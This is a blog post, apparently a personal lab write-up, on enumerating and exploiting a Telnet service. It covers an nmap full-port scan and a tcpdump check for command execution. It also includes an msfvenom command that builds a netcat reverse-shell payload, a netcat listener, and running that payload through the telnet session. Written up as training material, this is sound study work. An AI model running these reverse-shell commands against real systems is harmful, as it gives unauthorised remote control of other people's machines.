Hacking Network Services: LAB2: Telnet.

 What is Telnet?

Telnet is an application protocol which allows you, with the use of a telnet client, to connect to and execute commands on a remote machine that's hosting a telnet server.

The telnet client will establish a connection with the server. The client will then become a virtual terminal- allowing you to interact with the remote host.

Replacement

Telnet sends all messages in clear text and has no specific security mechanisms. Thus, in many applications and services, Telnet has been replaced by SSH in most implementations.

How does Telnet work?

The user connects to the server by using the Telnet protocol, which means entering "telnet" into a command prompt. The user then executes commands on the server by using specific Telnet commands in the Telnet prompt. You can connect to a telnet server with the following syntax: "telnet [ip] [port]"

-----------------------------------------------------------------------------------------------

Enumerating Telnet

we see that by assigning telnet to a non-standard port, it is not part of the common ports list, or top 1000 ports, that nmap scans. It's important to try every angle when enumerating, as the information you gather here will inform your exploitation stage.

nmap -vv -T5 -p- -A $ip

-----------------------------------------------------------------------------------------------

Exploiting Telnet

--------------------------

What is a Reverse Shell?

a "shell" can simply be described as a piece of code or program which can be used to gain code or command execution on a device

a reverse shell is a type of shell in which the target machine communicates back to the attacking machine.

The attacking machine has a listening port, on which it receives the connection, resulting in code or command execution being acheived

"telnet [ip] [port]"

check to see if what we're typing is being executed as a system command.

sudo tcpdump ip proto \\icmp -i tun0

tcpdump -i [interface]

"msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R"

[This will generate and encode a netcat reverse shell for us. ]

* -p = payload

* lhost = our local host IP address (this is your machine's IP address)

* lport = the port to listen on (this is the port on your machine)

* R = export the payload in raw format

nc -lvp [port]

-l: listen mode, for inbound connects

-v: verbose

-p: specify the local port (in our case, the port we are listening to)

runing the command on the telnet session: .RUN [the payload]

-----------------------------------------------------------------------------------------------------------------------------

Thanks for reading! -  

Roger - Ozz961.

Comments

Popular posts from this blog

Common Network Commands: IP R

Junior Security Analyst Intro

Example of A Day in the Life of a Junior (Associate) Security Analyst